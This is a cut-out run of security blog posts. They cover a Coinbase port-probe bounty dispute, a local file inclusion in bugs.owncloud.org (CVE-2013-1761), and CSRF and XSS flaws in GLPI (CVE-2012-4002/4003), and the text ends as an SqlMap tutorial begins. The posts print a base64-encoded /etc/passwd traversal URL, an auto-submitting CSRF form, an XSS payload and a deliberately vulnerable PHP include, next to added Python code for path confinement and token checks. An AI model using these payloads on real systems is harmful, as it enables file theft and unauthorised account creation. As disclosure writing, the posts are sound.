<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFAHNVjJ57mfschX3DEd4aEerm0ZhzctYihNUCg3IAPfimWwUirZmSCUzoziJ1HqstLJqfKzUUVynxcFSVO83aWn4iF8X-F3CqWLvdC8J1g9-phIJN-GlZhVNVNI7adKiJuswLuUIxYYE/s1600/open_port.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFAHNVjJ57mfschX3DEd4aEerm0ZhzctYihNUCg3IAPfimWwUirZmSCUzoziJ1HqstLJqfKzUUVynxcFSVO83aWn4iF8X-F3CqWLvdC8J1g9-phIJN-GlZhVNVNI7adKiJuswLuUIxYYE/s320/open_port.png" height="180" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><span style="font-size: small;">Here is what I received on entering a closed port (2243).</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><span style="font-size: small;">#http://scanme.nmap.org:2243/index.html</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaaZ0-eYKJiqCMRWuusPvX00u-IXJ0xUrFrZcuvQx31iWPvXKyU4kBpl6tjsUFGfZtqc1o752OscymAHwkYYkLVDUptamTQjyUUGOooZvbdEPeJmAJYrZ0tIUU0mfWWXGhP7RuGXyxekM/s1600/closedport.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaaZ0-eYKJiqCMRWuusPvX00u-IXJ0xUrFrZcuvQx31iWPvXKyU4kBpl6tjsUFGfZtqc1o752OscymAHwkYYkLVDUptamTQjyUUGOooZvbdEPeJmAJYrZ0tIUU0mfWWXGhP7RuGXyxekM/s320/closedport.png" height="180" width="320" /></a></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><span style="font-size: small;">This functionality could have been abused in many ways; one of them would be automating the attack and making multiple requests to remote servers on well-known ports. The Coinbase security team has already fixed this vulnerability, but I was quite disappointed when I received a bounty which was less than the minimum bounty they had promised on their responsible disclosure page, i.e. a payout of 5BTC.</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><span style="font-size: small;">The security team responded saying "We can't be sure of how this vulnerability could affect our coinbase users, and we issue bounties for only those vulnerabilities which affect our userbase". Anyway, I can't say I wasn't disappointed, but yes, they should have delivered what they had promised on their responsible disclosure <a href="https://coinbase.com/whitehat" target="_blank">page</a>.</span></span></div>
</div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-3141495527196173472013-03-20T05:24:00.000-07:002014-10-21T23:11:47.627-07:00Local File Inclusion Vulnerability in bugs.owncloud.org - CVE-2013-1761<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Last year, when I was finding vulnerabilities in owncloud.org, I came across a Local File Inclusion vulnerability in one of the subdomains of owncloud.org.</span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<b><span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">A Little more insight on LFI:</span></span></b></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<div style="text-align: left;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">It is a vulnerability that allows reading files present locally on the server (any file the web server process has read permission on), or, put differently, dynamic execution of interpreted code loaded from a file. The attack becomes serious when the application allows reading files located outside the web root, which is done with traversal sequences like ../../../../../../ or their URL-encoded form ..%2F..%2F..%2F..%2F; these step out of the root directory and reach the rest of the file system.</span></span></div>
</div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<b><span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">A PHP LFI example:</span></span></b></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">
<span style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><code>&lt;?php<br />
// Vulnerable example: the id value is used as a path without any validation<br />
$test = $_GET['id'];<br />
if (isset($test)) {<br />
&nbsp;&nbsp;&nbsp;&nbsp;include("pages/$test"); // ../ or ..%2F sequences in id escape the pages/ directory<br />
} else {<br />
&nbsp;&nbsp;&nbsp;&nbsp;include("index.php");<br />
}<br />
?&gt;</code></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">In the above example the id parameter is not sanitized to filter out traversal sequences like "..%2F", so it is trivially possible to include any file stored on the system outside the web root, as long as the web server can read it.</span></span><br />
<br /></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Now coming back to ownCloud: the website was bugs.owncloud.org, and there was a parameter named "files=" which would fetch the requested file from the server. The parameter was not validated at the server end, so it was pretty simple to read any local file the server had read permission on.</span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Vulnerable URL: http://bugs.owncloud.org/thebuggenie/serve&g=css&files=</span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">The "files" parameter was taking a base64 encoded value which was further decoded at the server end. So I encoded the value for ../../../../../../etc/passwd as Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== and accessed "http://bugs.owncloud.org/thebuggenie/serve&g=css&files=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==", which read out the most important file from the server.</span></span></div>
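Added example, not code from this post or from The Bug Genie: the confinement check that is missing both in the PHP snippet above and in the bugs.owncloud.org "files" parameter, written in Python. The base directory, the allowed file suffixes, and the decoding order (percent-decode as the web server would, base64-decode where the parameter is base64, then normalise and confine) are assumptions of this example.

```python
import base64
import binascii
import posixpath
from typing import Optional
from urllib.parse import unquote

# Added example (not the post's or The Bug Genie's code). Directory names,
# suffixes and inputs used below are constructed for illustration.


def decode_files_param(value: str) -> Optional[str]:
    """Base64-decode a 'files'-style parameter; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def resolve_under_base(base_dir: str, requested: str,
                       allowed_suffixes: frozenset) -> Optional[str]:
    """Join the request onto base_dir and refuse anything that does not stay inside it."""
    if "\x00" in requested or requested.startswith("/"):
        return None                       # absolute paths and NUL-truncation tricks
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, requested))
    # After normalisation every ../ has been applied, so a traversal has either
    # left base_dir entirely or collapsed onto base_dir itself; both are rejected.
    if not candidate.startswith(base + "/"):
        return None
    if posixpath.splitext(candidate)[1] not in allowed_suffixes:
        return None                       # only the file types this endpoint serves
    return candidate


def safe_path(base_dir: str, user_value: str, *, base64_encoded: bool = False,
              allowed_suffixes: frozenset = frozenset({".css", ".js"})) -> Optional[str]:
    """Percent-decode (as the web server would), optionally base64-decode, then confine."""
    value = unquote(user_value)           # turns ..%2F into ../ before the check
    if base64_encoded:
        decoded = decode_files_param(value)
        if decoded is None:
            return None
        value = decoded
    return resolve_under_base(base_dir, value, allowed_suffixes)


if __name__ == "__main__":
    css_dir = "/var/www/thebuggenie/public/css"   # assumed location, constructed
    # the encoded value from the post resolves to /etc/passwd and must be refused
    print(safe_path(css_dir, "Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==", base64_encoded=True))
    print(safe_path(css_dir, "theme.css"))
```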
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim1cmf280iSiwSM9d9vcfE6LJIgzuiK-G2C3i9GKnWz5Hop81xxuNRLU08X3Yb4RfDRy_51ukIMcfhnlPyGp6hkooZpdWGKQwShr3rhtowcPcg2Wcyu8iFzP4AOQbLRLi-_ay476omv8M/s1600/LFI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim1cmf280iSiwSM9d9vcfE6LJIgzuiK-G2C3i9GKnWz5Hop81xxuNRLU08X3Yb4RfDRy_51ukIMcfhnlPyGp6hkooZpdWGKQwShr3rhtowcPcg2Wcyu8iFzP4AOQbLRLi-_ay476omv8M/s320/LFI.png" height="184" width="320" /></a></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">I reported the vulnerability to ownCloud and they replied saying it's an issue with "The Bug Genie". Lukas Reschke helped me get in touch with the Bug Genie developers. They realized the criticality of the bug, quickly rolled out a fix within a week, and assigned the CVE id "CVE-2013-1761". They also acknowledged my contribution on their new software release <a href="http://www.thebuggenie.com/security/TBGSN-001-1" target="_blank">here.</a></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">I also want to mention <a href="https://www.statuscode.ch/" target="_blank">Lukas Reschke</a> for helping me get a CVE id.</span></span></div>
</div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-90408260608218792612012-10-16T04:33:00.003-07:002014-10-21T23:12:19.240-07:00Multiple CSRF and XSS vulnerabilities in GLPI - CVE-2012-4002/CVE-2012-4003<div dir="ltr" style="text-align: left;" trbidi="on">
A few months back, when I was researching some resource management software, I came across this amazing resource manager (<a href="http://www.glpi-project.org/spip.php?lang=en" target="_blank">GLPI</a>). After deploying it on my XAMPP server I started my initial phase of finding bugs.<br />
The installed version of GLPI was 0.83.2, which I found had multiple CSRF issues: some of the important functions, including adding new users or raising a ticket, lacked proper CSRF mitigation.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJJLUKruFgp3092l_q7xVTFBCPFRh4pBiI7kH_zKwtmfRPxsrdss6gxhSodojMQIjQ-tXlNv5ANmQJCNIhzYUj77YWetzCDJNra0KJMU4SaNvzWKh_V8ZBHOy1x33fHcmR6g6riA-dVvM/s1600/GLPI+-+Authentication_1350380606926.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJJLUKruFgp3092l_q7xVTFBCPFRh4pBiI7kH_zKwtmfRPxsrdss6gxhSodojMQIjQ-tXlNv5ANmQJCNIhzYUj77YWetzCDJNra0KJMU4SaNvzWKh_V8ZBHOy1x33fHcmR6g6riA-dVvM/s320/GLPI+-+Authentication_1350380606926.png" height="177" width="320" /></a></div>
<br />
I found that most of the user-related tasks were vulnerable to CSRF attacks. Here is a small POC on adding a new user. The page at http://&lt;localhost&gt;/glpi/front/preference.php allows us to add a user.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9MaoKJxA0qR0Qi4-Wp1md3Quj05Kba2X6qzxTObZHC9TKsLTnJXwGwvE1wSoGuBwXQeIK0h83Wvr0QPY5GNW3S0ObTDTBQ1wu6PEuTzB5gsXHWLAbHUC3Ntkzj0pOOUvUmFqUphQscr0/s1600/GLPI+-+User+Information_1350387624748.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9MaoKJxA0qR0Qi4-Wp1md3Quj05Kba2X6qzxTObZHC9TKsLTnJXwGwvE1wSoGuBwXQeIK0h83Wvr0QPY5GNW3S0ObTDTBQ1wu6PEuTzB5gsXHWLAbHUC3Ntkzj0pOOUvUmFqUphQscr0/s320/GLPI+-+User+Information_1350387624748.png" height="177" width="320" /></a></div>
<br />
And after clicking on update the following POST request is sent to the server.<br />
<br />
<br />
POST http://localhost/glpi/front/preference.php HTTP/1.1<br />
Host: localhost<br />
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-us,en;q=0.5<br />
Proxy-Connection: keep-alive<br />
Cookie: PHPSESSID=bstsomr0qf11n0446gqai8gp03<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 72<br />
<br />
name=glpi&id=2&realname=Attacker&language=en_GB&use_mode=0&update=Update<br />
<br />
Since there is no CSRF token in the POST request, an attacker can easily craft an HTML page and send it to a logged-in administrator; the administrator's browser then submits the form and creates the attacker as an authenticated user without the administrator knowing about it.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNZWPFx5MRNUyOIPqNEfVLKb6d3zdhZVf6THcyITUh0GsW5ah2xGyYNzka5OlLkFn3l72b_nMqJMfZk-oygHOy82YxHumfM3vXzvfrylUPKJ7cPOxYO_du0v8TL3QJ6zDfsmRYQnRmDVM/s1600/csrf.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNZWPFx5MRNUyOIPqNEfVLKb6d3zdhZVf6THcyITUh0GsW5ah2xGyYNzka5OlLkFn3l72b_nMqJMfZk-oygHOy82YxHumfM3vXzvfrylUPKJ7cPOxYO_du0v8TL3QJ6zDfsmRYQnRmDVM/s320/csrf.PNG" height="188" width="320" /></a></div>
<br />
<br />
<br />
HTML POST-CSRF example:<br />
<br />
&lt;html&gt;<br />
&lt;body onload=csrf.submit()&gt;<br />
&lt;form id="csrf" name="csrf" action="http://localhost/glpi/front/preference.php" method="POST"&gt;<br />
&lt;input type=hidden name="name" id="name" value="glpi"/&gt;<br />
&lt;input type=hidden name="id" id="id" value="2"/&gt;<br />
&lt;input type=hidden name="realname" id="realname" value="Attacker"/&gt;<br />
&lt;input type=hidden name="language" id="language" value="en_GB"/&gt;<br />
&lt;input type=hidden name="use_mode" id="use_mode" value="0"/&gt;<br />
&lt;input type=hidden name="update" id="update" value="Update"/&gt;<br />
&lt;/form&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;<br />
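Added example, not GLPI's own code: the synchronizer-token check whose absence lets the POST above be replayed from any origin. The in-memory session store, the hidden field name "csrf_token", and the request bodies are assumptions constructed for this example.

```python
import hmac
import secrets
from typing import Dict
from urllib.parse import parse_qs

# Added example (not GLPI's code). The store, field name and bodies are constructed.
SESSIONS: Dict[str, str] = {}   # session id (PHPSESSID value) -> CSRF token issued for it


def issue_csrf_token(session_id: str) -> str:
    """Mint an unguessable token, remember it for this session, and return it.

    The server embeds it in the preference form as a hidden field. A page on an
    attacker's origin cannot read that form, so it cannot include a valid token."""
    token = secrets.token_hex(32)
    SESSIONS[session_id] = token
    return token


def verify_post(session_id: str, body: str) -> bool:
    """True only if the form body carries the token issued to this very session."""
    expected = SESSIONS.get(session_id)
    if expected is None:
        return False                          # no session, or no form ever issued
    fields = parse_qs(body, keep_blank_values=True)
    supplied = fields.get("csrf_token", [""])[0]
    # constant-time comparison on bytes; a plain == would leak timing information
    return hmac.compare_digest(supplied.encode("utf-8"), expected.encode("utf-8"))


if __name__ == "__main__":
    sid = "bstsomr0qf11n0446gqai8gp03"       # session id from the captured request
    forged = "name=glpi&id=2&realname=Attacker&language=en_GB&use_mode=0&update=Update"
    token = issue_csrf_token(sid)
    print(verify_post(sid, forged))                            # False: body has no token
    print(verify_post(sid, forged + "&csrf_token=" + token))   # True: the real form
```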
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDyq4Np9egt80VzB9zsQzPVU6Vk8YaQAEjhAM9UIEoLei0xzn1zFRPyLUToZ3UZ_NPtpsCytW7cCNmjpdsGn17tf3ECQSau6xcmPe_5pxH-qs9HRvwXcPYJojVmHMcoAdu017pG5c64qc/s1600/attacker.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDyq4Np9egt80VzB9zsQzPVU6Vk8YaQAEjhAM9UIEoLei0xzn1zFRPyLUToZ3UZ_NPtpsCytW7cCNmjpdsGn17tf3ECQSau6xcmPe_5pxH-qs9HRvwXcPYJojVmHMcoAdu017pG5c64qc/s320/attacker.PNG" height="240" width="320" /></a></div>
<br />
Here are a few more locations which didn't have CSRF protection:<br />
<br />
http://localhost/glpi/front/user.form.php?id=3<br />
http://localhost/glpi/front/user.form.php?id=2<br />
http://localhost/glpi/front/user.form.php?id=5<br />
http://localhost/glpi/front/user.form.php?id=4<br />
http://localhost/glpi/front/user.form.php?new=1<br />
http://localhost/glpi/front/profile.form.php?id=3<br />
http://localhost/glpi/front/ruleimportcomputer.form.php<br />
http://localhost/glpi/front/popup.php?popup=edit_bookmark<br />
http://localhost/glpi/front/group.form.php<br />
http://localhost/glpi/front/entity.form.php<br />
http://localhost/glpi/front/popup.php<br />
http://localhost/glpi/front/auth.settings.php<br />
http://localhost/glpi/front/crontask.php?execute=*<br />
http://localhost/glpi/front/fieldunicity.form.php<br />
http://localhost/glpi/front/config.form.php<br />
http://localhost/glpi/front/notificationmailsetting.form.php<br />
http://localhost/glpi/front/*?reset=reset<br />
http://localhost/glpi/front/backup.php?<br />
<br />
<br />
Apart from CSRF, the application also had an XSS flaw at http://localhost/glpi/front/config.form.php, where there is an option to set text shown on the login page. This parameter was not sanitized on the back end and accepted any characters. A simple "&gt;&lt;script&gt;alert(1)&lt;/script&gt; would pop up an alert with 1 on the login screen.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheGSBNLfDnkHQ3s4JB3xeoxRLpMu03LVLPode5dKuWt5Gk20Jw3s-akXfbIuaZbZbxvomxP6ryOBVfos8YovxIWjn2UMeqLXBWlBjMTBhbAF_9KrY29bfJT62svVe0V4yS9y4kRA2wkhI/s1600/Xss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheGSBNLfDnkHQ3s4JB3xeoxRLpMu03LVLPode5dKuWt5Gk20Jw3s-akXfbIuaZbZbxvomxP6ryOBVfos8YovxIWjn2UMeqLXBWlBjMTBhbAF_9KrY29bfJT62svVe0V4yS9y4kRA2wkhI/s320/Xss.PNG" height="240" width="320" /></a></div>
<br />
<br />
<br />
The GLPI security team was very prompt and cooperative in handling all my reported issues, and a few weeks back they released a new secure version, GLPI 0.83.3, with XSS and CSRF protection.<br />
<br />
Thanks to the GLPI team for acknowledging me on their new software release (<a href="http://www.glpi-project.org/spip.php?page=annonce&id_breve=277&lang=en" target="_blank">click</a>).<br />
<br />
<br />
<br />
<br />
<br /></div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-10793154848001729502012-10-08T00:33:00.001-07:002016-05-08T21:46:14.102-07:00SQL Injection made simple<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: "verdana" , sans-serif;">SQL injection has been ruling the OWASP Top Ten for many years. It is the most powerful and feared vulnerability of all, "THE BAAP" of all living vulnerabilities found till date, so finding it and then exploiting it sometimes becomes a challenge. There are zillions of ways to identify it, but exploiting it the right way is sometimes a challenge for a pentester.</span><br />
<span style="font-family: "verdana" , sans-serif;">Here is an easy method, from beginner to expert level, for SQL injection exploitation using my favorite tool, SqlMap.</span><br />
<span style="font-family: "verdana" , sans-serif;">SqlMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">SQL injection attacks are those in which SQL commands are injected into the data plane in order to alter the execution of predefined SQL statements.</span></span><br />
<h3 style="text-align: left;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-weight: normal;">SQL injection can lead to:</span></h3>
<span style="font-family: "verdana" , sans-serif;">a) DBMS data manipulation</span><br />
<span style="font-family: "verdana" , sans-serif;">b) File system read and write access</span><br />
<span style="font-family: "verdana" , sans-serif;">c) Operating system control</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">SQLMAP - http://sqlmap.sourceforge.net</span></span><br />
<span style="font-family: "verdana" , sans-serif;">INTRO>> An open source command-line tool</span><br />
<span style="font-family: "verdana" , sans-serif;"> Detects and exploits SQL injection flaws in web applications</span><br />
<span style="font-family: "verdana" , sans-serif;"> Developed in Python, July 2006</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
